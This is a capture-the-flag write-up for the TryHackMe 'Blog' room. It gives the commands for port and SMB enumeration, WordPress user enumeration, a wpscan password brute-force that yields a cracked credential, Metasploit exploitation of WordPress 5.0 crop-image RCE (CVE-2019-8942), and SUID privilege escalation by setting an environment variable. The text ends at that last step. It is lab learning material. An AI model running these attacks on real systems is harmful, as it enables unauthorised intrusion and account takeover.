【THM】Blog-Practice
hihopkc. TryHackMe room for this write-up: https://tryhackme.com/room/blog
Difficulty: Medium
Billy Joel made a blog on his home computer and has started working on it. It’s going to be so awesome!
Enumerate this box and find the 2 flags that are hiding on it! Billy has some weird things going on his laptop. Can you maneuver around and get what you need? Or will you fall down the rabbit hole…
In order to get the blog to work with AWS, you’ll need to add blog.thm to your /etc/hosts file.
Credit to Sq00ky for the root privesc idea ;)
Port scan
nmap -p- -sC -sV -T4 10.10.131.180
PORT STATE SERVICE
22 open ssh
80 open http
139 open netbios-ssn
445 open netbios-ssn
First we notice the SMB ports (139 and 445), so we enumerate them with enum4linux:
enum4linux -a 10.10.131.180
The share listing contains a share named BillySMB. It allows anonymous access, so we connect to it (press Enter at the password prompt, or add -N to skip it):
smbclient //10.10.131.180/BillySMB
Download everything in the share.
One of the files is a rabbit hole; what does that mean?
There is also a QR code, which points to
The last file is an mp4.
This looks like a dead end, so the share is most likely just a distraction.
Let's check port 80 first and see what is there:
gobuster dir -u 10.10.131.180 -w /usr/share/wordlists/rockyou.txt
Note: rockyou.txt is a password list, not a path list. For directory brute-forcing, a dedicated wordlist such as /usr/share/wordlists/dirb/common.txt finds the usual WordPress paths (wp-admin, wp-content, wp-includes) with far fewer requests.
Check robots.txt:
User-agent: *
This is a very standard WordPress site. For WordPress enumeration there is an excellent tool called wpscan, which lets us enumerate usernames and then brute-force their passwords.
However, 10.10.131.180/wp-admin/ does not load properly: the site redirects to the blog.thm host name, exactly as the room description warns.
So we add the host to /etc/hosts:
10.10.131.180 blog.thm
Now enumerate users (after the hosts entry, http://blog.thm also works as the URL):
wpscan --url 10.10.131.180 --enumerate u
There are two users: bjoel and kwheel.
wpscan also reports the site is running WordPress 5.0, a version it flags as vulnerable.
Reading the advisory, we learn that exploiting it requires the username and password of a user with at least Author privileges.
So we brute-force both accounts against rockyou (the target IP changed here because the machine was redeployed between sessions):
wpscan --url 10.10.90.177 -U kwheel,bjoel -P /usr/share/wordlists/rockyou.txt --password-attack wp-login -t 64
| Username: kwheel, Password: cutiepie1 |
Success: kwheel / cutiepie1 is a valid login.
Next we move to Metasploit. The vulnerability matching this version and the Author-credential requirement is the WordPress 5.0 crop-image remote code execution (CVE-2019-8942), which ships as exploit/multi/http/wp_crop_rce.
Now just set the options (USERNAME, PASSWORD, RHOSTS, LHOST, plus VHOST blog.thm if the site does not answer on the bare IP) and run exploit.
We get a shell. The first thing to check for local privilege escalation is SUID binaries:
find / -perm -u=s -type f 2>/dev/null
One of the unusual SUID binaries reads the "admin" environment variable and, when it is not set, prints "Not an Admin". The environment is fully under the caller's control, so: what happens if we simply set that variable ourselves before running it?
export admin=1